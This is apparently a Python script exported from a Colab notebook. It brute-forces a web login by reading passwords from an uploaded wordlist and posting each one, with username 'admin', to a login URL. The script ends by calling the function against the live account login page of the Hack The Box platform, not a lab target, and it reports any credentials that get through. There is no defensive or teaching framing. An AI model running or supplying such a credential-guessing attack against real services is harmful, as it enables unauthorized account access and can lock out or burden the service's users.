# -*- coding: utf-8 -*-
"""Untitled7.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1EyYcjpKC9lkui0Ng9sAMPIToRCcfWl2G
"""

import requests
from google.colab import files
upload = files.upload()

def brute_force_login(target_url, username, password_list="Odette pswd.txt"):
    with open(password_list, "r") as file:
        for password in file.readlines():
            password = password.strip()
            data = {"username": username, "password": password}
            response = requests.post(target_url, data=data)
            if "login fails" not in response.text:
                print(f"Possible credentials found: {username} {password}")
                return
    print("No valid credentials found")

target_url = "https://account.hackthebox.com/login"
brute_force_login(target_url, "admin")